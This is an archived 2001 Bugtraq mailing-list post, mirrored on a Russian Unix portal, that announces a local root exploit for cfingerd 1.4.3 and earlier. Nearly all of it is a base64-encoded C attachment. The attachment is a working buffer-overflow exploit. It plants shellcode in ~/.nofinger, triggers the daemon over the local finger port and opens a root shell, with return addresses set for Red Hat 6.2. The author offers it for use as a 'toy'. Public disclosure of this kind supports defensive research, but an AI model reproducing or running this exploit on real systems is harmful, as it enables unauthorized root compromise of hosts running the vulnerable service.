BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Выпущена CD-версия OpenNet.RU для оффлайн просмотра. Для формирования заказа - перейдите по ссылке. SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Wed, 11 Jul 2001 09:24:42 +0200 (CEST)
From: qitest1 <qitest1@cercaband.com>
To: bugtraq@securityfocus.com
Subject: Exploit for cfingerd 1.4.3 and prior

--8323328-1796612692-994836282=:1032
Content-Type: TEXT/PLAIN; charset=US-ASCII


hi,

this is a simple code for exploiting the cfingerd 1.4.3 and prior vuln
recently posted by Steven Van Acker <deepstar@ulyssis.org>, 
which may lead to a local root compromise. Read the comments in the code 
for more detailed info.

bye

-- 
/* qitest1		http://qitest1.cjb.net *
 *    ``Ut tensio, sic vis. 69 tecum sis.''    *
 * main(){if(unsatisfied == 69) try_come(in);} */

--8323328-1796612692-994836282=:1032
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="cfingerd0x69.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0107110924420.1032@localhost.localdomain>
Content-Description: 
Content-Disposition: attachment; filename="cfingerd0x69.c"

LyoNCiAqIGNmaW5nZXJkIDEuNC4zIGFuZCBwcmlvciBMaW51eCB4ODYgbG9j
YWwgcm9vdCBleHBsb2l0DQogKiBieSBxaXRlc3QxIDEwLzA3LzIwMDENCiAq
DQogKiBUaGlzIGNvZGUgc3VjY2Vzc2Z1bGx5IGV4cGxvaXRzIHRoZSBib2Yg
dnVsbmVyYWJpbGl0eSBmb3VuZCBieQ0KICogU3RldmVuIFZhbiBBY2tlciA8
ZGVlcHN0YXJAdWx5c3Npcy5vcmc+IGFuZCByZWNlbnRseSBwb3N0ZWQgdG8N
CiAqIGJ1Z3RyYXEuIElmIHRoZSBBTExPV19MSU5FX1BBUlNJTkcgb3B0aW9u
IGlzIHNldCwgYW5kIGl0IGlzIHNldA0KICogYnkgZGVmYXVsdCwgdGhlIGJv
ZiBzaW1wbHkgb2NjdXJzIHdoZW4gcmVhZGluZyB0aGUgfi8ubm9maW5nZXIN
CiAqIGZpbGUuIElmIGNmaW5nZXJkIGlzIGNhbGxlZCBieSBpbmV0ZCBhcyBy
b290LCBhIHJvb3Qgc2hlbGwgd2lsbCBiZQ0KICogc3Bhd25lZC4gQnV0IGl0
IGlzIHF1aXRlIGZ1bm55IHRoYXQgdGhlIGF1dGhvcnMgb2YgY2ZpbmdlcmQg
aW4gdGhlDQogKiBSRUFETUUgYWxtb3N0IHNlZW0gdG8gZW5jb3VyYWdlIHBl
b3BsZSB0byBzZXQgaW5ldGQuY29uZiBmb3INCiAqIGNhbGxpbmcgY2Zpbmdl
cmQgYXMgcm9vdC4gICAgIA0KICoNCiAqIEdyZWV0czogbXkgZnJpZW5kcyBv
biAjc2lrdXJlenphQFVuZGVybmV0DQogKgkgICBqdHJpcHBlcjogaGkgbWFu
LCBwbGF5X3RoZV9nYW1lIHdpdGggbWUhID0pDQogKgkgICB3YXJzb24gYW5k
IHdhcmV4DQogKg0KICogRnVjazogICBmZW5kZXInL2hjZXphcjogSSB3YW50
IHlvdXIgcmVzcGVjdC4uDQogKg0KICogaGF2ZSBmdW4gd2l0aCB0aGlzIDB4
NjkgbG9jYWwgdG95ISA9KSANCiAqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4N
CiNpbmNsdWRlIDxwd2QuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNp
bmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQoj
aW5jbHVkZSA8bmV0ZGIuaD4NCg0KI2RlZmluZQlSRVRQT1MJCTg0DQojZGVm
aW5lIExPQ0FMSE9TVAkibG9jYWxob3N0Ig0KI2RlZmluZQlGSU5HRVJEX1BP
UlQJNzkNCg0KICBzdHJ1Y3QgdGFyZw0KICAgIHsNCiAgICAgIGludCAgICAg
ICAgICAgICAgICAgIGRlZjsNCiAgICAgIGNoYXIgICAgICAgICAgICAgICAg
ICpkZXNjcjsNCiAgICAgIHVfbG9uZyAgICAJICAgcmV0YWRkcjsNCiAgICB9
Ow0KDQogIHN0cnVjdCB0YXJnIHRhcmdldFtdPQ0KICAgIHsgICAgICAgICAg
ICAgICAgICAgDQogICAgICB7MCwgIlJlZCBIYXQgNi4yIHdpdGggY2Zpbmdl
cmQgMS40LjAgZnJvbSB0YXIuZ3oiLCAweGJmZmZmNjYwfSwNCiAgICAgIHsx
LCAiUmVkIEhhdCA2LjIgd2l0aCBjZmluZ2VyZCAxLjQuMSBmcm9tIHRhci5n
eiIsIDB4YmZmZmY2NjF9LA0KICAgICAgezIsICJSZWQgSGF0IDYuMiB3aXRo
IGNmaW5nZXJkIDEuNC4yIGZyb20gdGFyLmd6IiwgMHhiZmZmZjY2Mn0sDQog
ICAgICB7MywgIlJlZCBIYXQgNi4yIHdpdGggY2ZpbmdlcmQgMS40LjMgZnJv
bSB0YXIuZ3oiLCAweGJmZmZmNjYzfSwNCiAgICAgIHs2OSwgTlVMTCwgMH0N
CiAgICB9Ow0KDQogIGNoYXIgc2hlbGxjb2RlW10gPQkJCS8qIEFsZXBoMSBj
b2RlICovDQogICJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4
ODhceDQ2XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KICAiXHg4OVx4ZjNc
eDhkXHg0ZVx4MDhceDhkXHg1Nlx4MGNceGNkXHg4MFx4MzFceGRiXHg4OVx4
ZDhceDQwXHhjZCINCiAgIlx4ODBceGU4XHhkY1x4ZmZceGZmXHhmZi9iaW4v
c2giOw0KDQogIGludCAgICBzZWwgPSAwLCBvZmZzZXQgPSAwOw0KDQogIHZv
aWQJcGxheV90aGVfZ2FtZSh1X2xvbmcgcmV0YWRkciwgc3RydWN0IHBhc3N3
ZCAqdXNlcik7DQogIGludAlzb2NrYW1pKGNoYXIgKmhvc3QsIGludCBwb3J0
KTsNCiAgdm9pZAlzaGVsbGFtaShpbnQgc29jayk7DQogIHZvaWQgIHVzYWdl
KGNoYXIgKnByb2duYW1lKTsNCiAgDQppbnQNCm1haW4oaW50IGFyZ2MsIGNo
YXIgKiphcmd2KQ0Kew0KICBpbnQJCQlzb2NrLCBjbnQ7DQogIHVpZF90ICAg
ICAgICAgICAgICAgICBldWlkOw0KICBjaGFyCQkJc2J1ZlsyNTZdOw0KICBz
dHJ1Y3QgcGFzc3dkCQkqdXNlcjsNCg0KICBwcmludGYoIlxuICBjZmluZ2Vy
ZCAxLjQuMyBhbmQgcHJpb3IgZXhwbG9pdCBieSBxaXRlc3QxXG5cbiIpOw0K
DQogIHdoaWxlKChjbnQgPSBnZXRvcHQoYXJnYyxhcmd2LCJ0Om86aCIpKSAh
PSBFT0YpDQogICAgew0KICAgc3dpdGNoKGNudCkNCiAgICAgICAgew0KICAg
Y2FzZSAndCc6DQogICAgIHNlbCA9IGF0b2kob3B0YXJnKTsNCiAgICAgYnJl
YWs7DQogICBjYXNlICdvJzoNCiAgICAgb2Zmc2V0ID0gYXRvaShvcHRhcmcp
Ow0KICAgICBicmVhazsNCiAgIGNhc2UgJ2gnOg0KICAgICB1c2FnZShhcmd2
WzBdKTsNCiAgICAgYnJlYWs7DQogICAgICAgIH0NCiAgICB9DQoNCiAgZXVp
ZCA9IGdldGV1aWQoKTsNCiAgdXNlciA9IChzdHJ1Y3QgcGFzc3dkICopZ2V0
cHd1aWQoZXVpZCk7DQoNCiAgcHJpbnRmKCIrVXNlcjogJXNcbiAgYWdhaW5z
dDogJXNcbiIsIHVzZXItPnB3X25hbWUsIHRhcmdldFtzZWxdLmRlc2NyKTsN
CiAgdGFyZ2V0W3NlbF0ucmV0YWRkciArPSBvZmZzZXQ7DQogIHByaW50Zigi
K1VzaW5nOiByZXRhZGRyID0gJXAuLi5cbiAgb2tcbiIsIHRhcmdldFtzZWxd
LnJldGFkZHIpOw0KDQogIHBsYXlfdGhlX2dhbWUodGFyZ2V0W3NlbF0ucmV0
YWRkciwgdXNlcik7DQoNCiAgc29jayA9IHNvY2thbWkoTE9DQUxIT1NULCBG
SU5HRVJEX1BPUlQpOw0KICBzcHJpbnRmKHNidWYsICIlc1xuIiwgdXNlci0+
cHdfbmFtZSk7DQogIHNlbmQoc29jaywgc2J1Ziwgc3RybGVuKHNidWYpLCAw
KTsNCg0KICBwcmludGYoIitXYWl0aW5nIGZvciBhIHNoZWxsLi4uXG4gIDB4
NjkgPSlcbiIpOw0KICBzbGVlcCgxKTsNCiAgc2hlbGxhbWkoc29jayk7ICAN
Cn0NCg0Kdm9pZA0KcGxheV90aGVfZ2FtZSh1X2xvbmcgcmV0YWRkciwgc3Ry
dWN0IHBhc3N3ZCAqdXNlcikNCnsNCiAgY2hhcgkJCXpidWZbMjU2XSwgbm9m
aW5nZXJfcGF0aFsyNTZdOw0KICBpbnQJCQlpLCBuID0gMDsgDQogIEZJTEUg
CQkJKm5vZmluZ2VyX2ZpbGU7DQoNCiAgbWVtc2V0KHpidWYsICdceDkwJywg
c2l6ZW9mKHpidWYpKTsNCiAgZm9yKGkgPSBSRVRQT1MgLSBzdHJsZW4oc2hl
bGxjb2RlKTsgaSA8IFJFVFBPUzsgaSsrKQ0KICAgICAgICB6YnVmW2ldID0g
c2hlbGxjb2RlW24rK107DQogIA0KICB6YnVmW1JFVFBPUyArIDBdID0gKHVf
Y2hhcikgKHJldGFkZHIgJiAweDAwMDAwMGZmKTsNCiAgemJ1ZltSRVRQT1Mg
KyAxXSA9ICh1X2NoYXIpKChyZXRhZGRyICYgMHgwMDAwZmYwMCkgPj4gOCk7
DQogIHpidWZbUkVUUE9TICsgMl0gPSAodV9jaGFyKSgocmV0YWRkciAmIDB4
MDBmZjAwMDApID4+IDE2KTsNCiAgemJ1ZltSRVRQT1MgKyAzXSA9ICh1X2No
YXIpKChyZXRhZGRyICYgMHhmZjAwMDAwMCkgPj4gMjQpOw0KICB6YnVmW1JF
VFBPUyArIDRdID0gJ1x4MDAnOw0KDQogIHNwcmludGYobm9maW5nZXJfcGF0
aCwgIiVzLy5ub2ZpbmdlciIsIHVzZXItPnB3X2Rpcik7DQogIG5vZmluZ2Vy
X2ZpbGUgPSBmb3Blbihub2Zpbmdlcl9wYXRoLCAidyIpOw0KICBwcmludGYo
IitXcml0aW5nIH4vLm5vZmluZ2VyLi4uXG4iKTsNCiAgZnByaW50Zihub2Zp
bmdlcl9maWxlLCAiJCVzXG4iLCB6YnVmKTsNCiAgcHJpbnRmKCIgIGRvbmVc
biIpOw0KICBmY2xvc2Uobm9maW5nZXJfZmlsZSk7DQoNCiAgcmV0dXJuOw0K
fQ0KDQppbnQNCnNvY2thbWkoY2hhciAqaG9zdCwgaW50IHBvcnQpDQp7DQpz
dHJ1Y3Qgc29ja2FkZHJfaW4gYWRkcmVzczsNCnN0cnVjdCBob3N0ZW50ICpo
cDsNCmludCBzb2NrOw0KDQogIHNvY2sgPSBzb2NrZXQoQUZfSU5FVCwgU09D
S19TVFJFQU0sIDApOw0KICBpZihzb2NrID09IC0xKQ0KICAgICAgICB7DQog
ICAgICAgICAgcGVycm9yKCJzb2NrZXQoKSIpOw0KICAgICAgICAgIGV4aXQo
LTEpOw0KICAgICAgICB9DQogDQogIGhwID0gZ2V0aG9zdGJ5bmFtZShob3N0
KTsNCiAgaWYoaHAgPT0gTlVMTCkNCiAgICAgICAgew0KICAgICAgICAgIHBl
cnJvcigiZ2V0aG9zdGJ5bmFtZSgpIik7DQogICAgICAgICAgZXhpdCgtMSk7
DQogICAgICAgIH0NCg0KICBtZW1zZXQoJmFkZHJlc3MsIDAsIHNpemVvZihh
ZGRyZXNzKSk7DQogIG1lbWNweSgoY2hhciAqKSAmYWRkcmVzcy5zaW5fYWRk
ciwgaHAtPmhfYWRkciwgaHAtPmhfbGVuZ3RoKTsNCiAgYWRkcmVzcy5zaW5f
ZmFtaWx5ID0gQUZfSU5FVDsNCiAgYWRkcmVzcy5zaW5fcG9ydCA9IGh0b25z
KHBvcnQpOw0KDQogIGlmKGNvbm5lY3Qoc29jaywgKHN0cnVjdCBzb2NrYWRk
ciAqKSAmYWRkcmVzcywgc2l6ZW9mKGFkZHJlc3MpKSA9PSAtMSkNCiAgICAg
ICAgew0KICAgICAgICAgIHBlcnJvcigiY29ubmVjdCgpIik7DQogICAgICAg
ICAgZXhpdCgtMSk7DQogICAgICAgIH0NCg0KICByZXR1cm4oc29jayk7DQp9
DQoNCg0Kdm9pZA0Kc2hlbGxhbWkoaW50IHNvY2spDQp7DQogIGludCAgICAg
ICAgICAgICBuOw0KICBjaGFyICAgICAgICAgICAgcmVjdmJ1ZlsxMDI0XSwg
KmNtZCA9ICJpZDsgdW5hbWUgLWFcbiI7DQogIGZkX3NldCAgICAgICAgICBy
c2V0Ow0KDQogIHNlbmQoc29jaywgY21kLCBzdHJsZW4oY21kKSwgMCk7DQoN
CiAgd2hpbGUgKDEpDQogICAgew0KICAgICAgRkRfWkVSTygmcnNldCk7DQog
ICAgICBGRF9TRVQoc29jaywgJnJzZXQpOw0KICAgICAgRkRfU0VUKFNURElO
X0ZJTEVOTywgJnJzZXQpOw0KICAgICAgc2VsZWN0KHNvY2srMSwgJnJzZXQs
IE5VTEwsIE5VTEwsIE5VTEwpOw0KICAgICAgaWYoRkRfSVNTRVQoc29jaywg
JnJzZXQpKQ0KICAgICAgICB7DQogICAgICAgICAgbiA9IHJlYWQoc29jaywg
cmVjdmJ1ZiwgMTAyNCk7DQogICAgICAgICAgaWYgKG4gPD0gMCkNCiAgICAg
ICAgICAgIHsNCiAgICAgICAgICAgICAgcHJpbnRmKCJDb25uZWN0aW9uIGNs
b3NlZCBieSBmb3JlaWduIGhvc3QuXG4iKTsNCiAgICAgICAgICAgICAgZXhp
dCgwKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICByZWN2YnVmW25dID0g
MDsNCiAgICAgICAgICBwcmludGYoIiVzIiwgcmVjdmJ1Zik7DQogICAgICAg
IH0NCiAgICAgIGlmIChGRF9JU1NFVChTVERJTl9GSUxFTk8sICZyc2V0KSkN
CiAgICAgICAgew0KICAgICAgICAgIG4gPSByZWFkKFNURElOX0ZJTEVOTywg
cmVjdmJ1ZiwgMTAyNCk7DQogICAgICAgICAgaWYgKG4gPiAwKQ0KICAgICAg
ICAgICAgew0KICAgICAgICAgICAgICByZWN2YnVmW25dID0gMDsNCiAgICAg
ICAgICAgICAgd3JpdGUoc29jaywgcmVjdmJ1Ziwgbik7DQogICAgICAgICAg
ICB9DQogICAgICAgIH0NCiAgICB9DQogIHJldHVybjsNCn0NCg0Kdm9pZA0K
dXNhZ2UoY2hhciAqcHJvZ25hbWUpDQp7DQogIGludCAgaSA9IDA7DQogIA0K
ICBwcmludGYoIlVzYWdlOiAlcyBbb3B0aW9uc11cbiIsIHByb2duYW1lKTsN
CiAgcHJpbnRmKCJPcHRpb25zOlxuIg0KICAgICAgICAgIiAgLXQgdGFyZ2V0
XG4iDQogICAgICAgICAiICAtbyBvZmZzZXRcbiINCgkgIiAgLWggKGhlbHAp
XG4iDQogICAgICAgICAiQXZhaWxhYmxlIHRhcmdldHM6XG4iKTsNCiAgd2hp
bGUodGFyZ2V0W2ldLmRlZiAhPSA2OSkNCiAgICAgICAgeyANCiAgICAgICAg
ICBwcmludGYoIiAgJWQpICVzXG4iLCB0YXJnZXRbaV0uZGVmLCB0YXJnZXRb
aV0uZGVzY3IpOw0KICAgICAgICAgIGkrKzsNCiAgICAgICAgfSANCg0KICBl
eGl0KDEpOw0KfQ0K
--8323328-1796612692-994836282=:1032--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД